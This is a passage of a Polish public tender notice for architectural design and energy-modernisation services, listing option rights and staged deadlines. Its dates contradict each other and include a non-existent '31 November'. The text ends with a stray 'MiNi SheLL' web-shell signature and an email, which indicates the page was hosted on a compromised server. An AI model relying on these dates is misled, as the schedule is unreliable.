2. W ramach realizacji przedmiotu zamówienia Zamawiający przewiduje możliwość zastosowania prawa opcji, których szczegółowy zakres zawiera Szczegółowy opis przedmiotu zamówienia, stanowiący zał. nr 1 do SIWZ oraz Tabela elementów projektowych objętych prawem opcji, stanowiąca zał. nr 6.1 do SIWZ, zamieszczonej na stronie internetowej Zamawiającego.
Zamawiający zastrzega, że będzie mógł skorzystać z prawa opcji, w zależności od decyzji Zamawiającego, w przypadku gdy będzie wymagał tego cel osiągnięcia zakładanych w audycie energetycznym efektów modernizacji energetycznej oraz gdy usługi wynikające z prawa opcji będą leżały w zakresie możliwości finansowych Zamawiającego.
3. Wykonawca zobowiązuje się wykonać przedmiot umowy w terminie do  31.10.2018 r., 
z uwzględnieniem poniższych etapów:
1)	Etap IA - wykonanie i dostarczenie kompletnej inwentaryzacji architektoniczno - budowlanej budynku, dokumentacji audytu energetycznego oraz zatwierdzenie koncepcji projektowej w ciągu 
3 miesięcy od daty podpisania umowy, z zastrzeżeniem, że Wykonawca przedstawi Zamawiającemu wstępną koncepcje w terminie 2 miesięcy od dnia podpisania umowy. Zamawiający może w terminie 7 dni od dnia otrzymania koncepcji zgłaszać uwagi. Wykonawca zobowiązany jest wykonać ostateczną koncepcję projektową po uwzględnieniu uwag Zamawiającego. Formę przedstawienia wstępnej wersji koncepcji projektowej Wykonawca uzgodni z Zamawiającym.
2)	Etap IB - wykonanie i dostarczenie kompletnego projektu budowlanego wraz z potwierdzeniem złożonego wniosku o uzyskanie decyzji o pozwoleniu na budowę - w terminie do 30.12.2016 r., 
z zastrzeżeniem, że Wykonawca przedstawi Zamawiającemu wstępną wersję projektu budowlanego w terminie do 31 listopada 2016 r. Formę przekazania wstępnej wersji projektu budowlanego Wykonawca uzgodni z Zamawiającym
(w przypadku zaoferowania przez Wykonawcę skróconego terminu wykonania zamówienia, do umowy zostanie wpisany termin pomniejszony o ilość dni wskazanych w ofercie w ramach kryterium oceny ofert: skrócenie terminu wykonania zamówienia)
3)	Etap IC - wykonanie i dostarczenie kompletnego projektu wykonawczego oraz ostatecznej decyzji o pozwoleniu na budowę wraz z załącznikami - w terminie do 31.03.2017 r., z zastrzeżeniem, że Wykonawca przedstawi Zamawiającemu wstępny projekt wykonawczy w terminie do 28 lutego 2017r. Formę przekazania wstępnej wersji projektu wykonawczego Wykonawca uzgodni z Zamawiającym.
4)	Etap II - udzielanie odpowiedzi na pytania wykonawców, w trakcie trwania procedury postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych w terminie do zakończenia procedury udzielenia zamówienia publicznego. 
5)	Etap III - pełnienie nadzoru autorskiego: Zamawiający przewiduje, że pełnienie nadzoru autorskiego będzie trwało przez okres 16 miesięcy od dnia zawarcia umowy na roboty budowlane, do dnia ich zakończenia, z zastrzeżeniem § 16 ust. 1 pkt 1 lit. k - n. Zamawiający przewiduje zakończenie robót budowlanych do dnia 31 października 2016 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com